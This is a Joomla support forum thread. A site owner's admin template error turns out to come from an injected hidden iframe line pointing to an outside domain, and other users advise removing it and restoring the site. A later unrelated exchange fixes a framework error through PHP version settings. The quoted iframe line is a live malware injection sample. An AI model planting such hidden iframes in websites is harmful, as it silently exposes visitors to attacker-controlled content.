Viewing 13 posts - 1 through 13 (of 13 total)
  • Author

This is the error message when going to “Modules” on backend and other operations on the backend:

Parse error: syntax error, unexpected T_ECHO, expecting ‘,’ or ‘;’ in /home/XXXXXX/public_html/avisward.com/administrator/templates/khepri/index.php on line 119

This is line 119:

echo “<iframe src=”http://vafuiek.com/?click=5129BF” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>”;

Will somebody please tell me what’s missing and where it should be inserted.

It is quite obvious I’m clueless, I know. I’m humble and gracious.

Thanks in the meantime.

Best regards,
    GeoVi

nguyenhuu quang Friend

delet this CODE
    I think it is malware.
    pls check your site again, carefull.
    and update to lastest version.
    or Download newest version and upload this template to your site.
    It is Admin tamplate.

GeoVi Friend

<em>@quang268 126338 wrote:</em><blockquote>delet this CODE
    I think it is malware.
    pls check your site again, carefull.
    and update to lastest version.
    or Download newest version and upload this template to your site.
    It is Admin tamplate.</blockquote>

quang, thank you so very much! I deleted it and my problem was solved. Now, I’m concerned that there are other problems (malware). I am using the latest Joomla version.

What do you mean by:
    “admin template” please?

I appreciate your help tremendously!!! *hugs*

GeoVi

nguyenhuu quang Friend

open FTP /home/XXXXXX/public_html/avisward.com/administrator/templates/
    del folder called khepri/
    and then Download JL 1.5.10 and unzip, upload khepri/ again

GeoVi Friend

<em>@quang268 126530 wrote:</em><blockquote>open FTP /home/XXXXXX/public_html/avisward.com/administrator/templates/
    and then Download JL 1.5.10 and unzip, upload khepri/ again</blockquote>

Ahhh got it! Okay, will do! Thank you!

GeoVi Friend

<em>@quang268 126530 wrote:</em><blockquote>open FTP /home/XXXXXX/public_html/avisward.com/administrator/templates/
    and then Download JL 1.5.10 and unzip, upload khepri/ again</blockquote>

Quang,

I have done this but the problem persists. It seems my site has been compromised somehow. Any advice/suggestions? I repeated the process and of course, it worked. I do not wish to continue this but end the violation.

Thanks for any help you can provide.

GeoVi

mj1256 Friend

yes, that is a common hack, you need to find that line in all of your index files, there is also one in components adminstrator that will have it

I had this happen, fortunately i had joomlapack backups and i was retored in minutes

make sure you tell your host about it

and if you need help, my guys at 911 will fix it and secure the site for you

GeoVi Friend

<em>@mj1256 126687 wrote:</em><blockquote>yes, that is a common hack, you need to find that line in all of your index files, there is also one in components adminstrator that will have it

I had this happen, fortunately i had joomlapack backups and i was retored in minutes

make sure you tell your host about it

and if you need help, my guys at 911 will fix it and secure the site for you</blockquote>

Fortunately MJ, the site hasn’t been disabled because of the hack. I have a joomlapack backup, as well. I followed your instructions per the index.php files and notified my hosting company.

Thank you So very much for your help and for offering help through 911 if I should need it.

I’m grateful,
    GeoVi 🙂

swillett Friend

Im having a similar problem, just uploaded the latest version (T3 V2 package) to my joomla site and all was going well until i enabled the T3 framework in my joomla back end and now i can not access this and have the following message.

Parse error: syntax error, unexpected ‘)’, expecting ‘(‘ in XXXXXXX/plugins/system/jat3/core/common.php on line 230

Line 230 in commom.php file =
    if ($browser->getBrowser() == Browser::BROWSER_IPAD) return false;

I can not put it down to your iisue show in this thread directly but feel you may have knowedge of this issue?

I am running Joomla 1.5.17

I am also running Mosets Tree directory for your info! all was working fine up to when the T3 Framework extension was enabled.

Any help appreciated along with a swift pint to sooth the head.

Sherlock Friend

<em>@swillett 220177 wrote:</em><blockquote>Im having a similar problem, just uploaded the latest version (T3 V2 package) to my joomla site and all was going well until i enabled the T3 framework in my joomla back end and now i can not access this and have the following message.

Parse error: syntax error, unexpected ‘)’, expecting ‘(‘ in XXXXXXX/plugins/system/jat3/core/common.php on line 230

Line 230 in commom.php file =
    if ($browser->getBrowser() == Browser::BROWSER_IPAD) return false;

I can not put it down to your iisue show in this thread directly but feel you may have knowedge of this issue?

I am running Joomla 1.5.17

I am also running Mosets Tree directory for your info! all was working fine up to when the T3 Framework extension was enabled.

Any help appreciated along with a swift pint to sooth the head.</blockquote>

Dear swillett,

Maybe you are running the php 4.x version,Just switch to run joomla 5.x,I think it would help.

swillett Friend

<em>@dathq 220357 wrote:</em><blockquote>Dear swillett,

Maybe you are running the php 4.x version,Just switch to run joomla 5.x,I think it would help.</blockquote>

this worked perfectly dathq,

thank you so much for this, time and time again i had been looking at the common.php file to no avail.

For those with the same issue, this is what i have done to fix:

1) Simply upload the T3 quick start files.
    2) go through the installation as normal
    3) once complete, before removing the installation folder do the following:
    3.1) download (access) the htaccess.txt file and add the following
    3.2)

AddType x-mapp-php4 .php
    AddType x-mapp-php5 .php
    SetEnv PHP_VER

3.3) then save and rename the htaccess.txt file to .htaccess and upload to root folder. (remember to remove the old htaccess.txt file as well)

That was it, over 4 hours i spent going through the common.php file, i never thought about my hosts PHP default settings for the new domain, madness.

Once again thank you dathq.

ediancu Friend

I have the same problem: /plugins/system/jat3/core/common.php on line 230

Line 230: if ($browser->getBrowser() == Browser::BROWSER_IPAD) return false;

This is how it looks. Can somebody provide some help? Pleaste… I have installed joomla 20 times. I am using php 5.2.12

I have tryed to do the steps above but no result… the same thing. There is any special place to put the code inside the htaccess.txt file?
    Thank You.

Saguaros Moderator

Hello @ediancu!

You try to ask the hosting service to upgrade your server to the last version of php, and then check the issue again.

Viewing 13 posts - 1 through 13 (of 13 total)

This topic contains 13 replies, has 7 voices, and was last updated by  Saguaros 13 years, 2 months ago.

We moved to new unified forum. Please post all new support queries in our New Forum